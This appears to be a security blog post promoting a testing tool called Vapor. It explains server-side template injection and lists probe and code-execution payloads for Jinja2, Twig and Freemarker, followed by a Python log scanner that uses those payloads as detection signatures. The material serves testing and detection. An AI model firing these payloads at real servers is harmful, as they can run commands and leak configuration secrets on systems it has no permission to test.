Server-Side Template Injection (SSTI) remains one of the most impactful vulnerabilities in modern web applications. In this post, we’ll explore detection techniques that work across multiple template engines.

Understanding SSTI

When user input is embedded directly into the template source, rather than passed to the template as data, attackers can inject template syntax that the engine evaluates, executing arbitrary code on the server.

The Classic Test

The most basic detection payload:

{{7*7}}

If the response contains 49 instead of the literal string {{7*7}}, the server evaluated the expression and you’ve likely found an injection point.

Engine-Specific Payloads

Different template engines require different approaches.

Jinja2 (Python)

{{config.items()}}
{{''.__class__.__mro__[2].__subclasses__()}}

Twig (PHP)

{{_self.env.registerUndefinedFilterCallback("exec")}}
{{_self.env.getFilter("id")}}

Freemarker (Java)

${"freemarker.template.utility.Execute"?new()("id")}
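Seen from the defending side, the probe strings above double as detection signatures. The following is an added example, not code from this post or from Vapor: it URL-decodes request targets from access-log lines (including double encoding) and flags the payloads shown above by engine. The log layout, the function names and the sample lines are assumptions made for illustration.

```python
import re
from urllib.parse import unquote_plus

# Signatures derived from the probe strings shown in this post, keyed by engine.
SIGNATURES = {
    "generic-arithmetic": re.compile(r"(?:\{\{|\$\{)\s*\d+\s*\*\s*\d+\s*\}"),
    "jinja2": re.compile(r"\{\{.*?(?:__class__|__mro__|__subclasses__|config\.items).*?\}\}"),
    "twig": re.compile(r"\{\{\s*_self\.env\.(?:registerUndefinedFilterCallback|getFilter)"),
    "freemarker": re.compile(r"freemarker\.template\.utility\.Execute"),
}

# Assumed layout: combined-log style 'ip - - [time] "METHOD target PROTO" status size'.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<target>\S+) [^"]*" (?P<status>\d{3})')

# Constructed sample lines (documentation IP ranges), not real traffic.
T = "[10/Mar/2025:10:00:01 +0000]"
SAMPLE_LOG = [
    f'198.51.100.7 - - {T} "GET /search?q=shoes HTTP/1.1" 200 1532',
    f'203.0.113.9 - - {T} "GET /greet?name=%7B%7B7*7%7D%7D HTTP/1.1" 200 412',
    f'203.0.113.9 - - {T} "GET /greet?name=%257B%257Bconfig.items()%257D%257D HTTP/1.1" 200 9021',
    f'203.0.113.9 - - {T} "GET /greet?name=%7B%7B_self.env.getFilter(%22id%22)%7D%7D HTTP/1.1" 500 88',
    f'203.0.113.9 - - {T} "GET /greet?name=%24%7B%22freemarker.template.utility.Execute%22%3Fnew()(%22id%22)%7D HTTP/1.1" 500 88',
    f'198.51.100.7 - - {T} "GET /docs?topic=price%20*%20qty HTTP/1.1" 200 640',
]

def decode(value, rounds=3):
    # URL-decode repeatedly (bounded) so double-encoded probes still match.
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def scan(lines):
    """Return (line_number, client_ip, status, [matched signatures]) per flagged line."""
    findings = []
    for number, line in enumerate(lines, 1):
        match = LOG_RE.match(line)
        if not match:
            continue  # not in the assumed log layout; skip rather than guess
        target = decode(match["target"])
        hits = sorted(n for n, rx in SIGNATURES.items() if rx.search(target))
        if hits:
            findings.append((number, match["ip"], int(match["status"]), hits))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A flagged request that returns 200 with an unusually large body, or a burst of 500s from one client, is worth correlating with application error logs for engine-specific stack traces.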

Vapor’s AI-Assisted Detection

Vapor automatically suggests SSTI payloads based on:

  1. Response analysis: Detecting template engine signatures
  2. Error message parsing: Identifying engine-specific errors
  3. Behavioral patterns: Understanding how the application processes input

Pro tip: Use Vapor’s tab completion when crafting payloads. It learns from your testing patterns.

Conclusion

SSTI detection requires understanding both the vulnerability class and the specific template engine in use. With AI assistance, you can move faster and catch more edge cases.

Stay safe out there.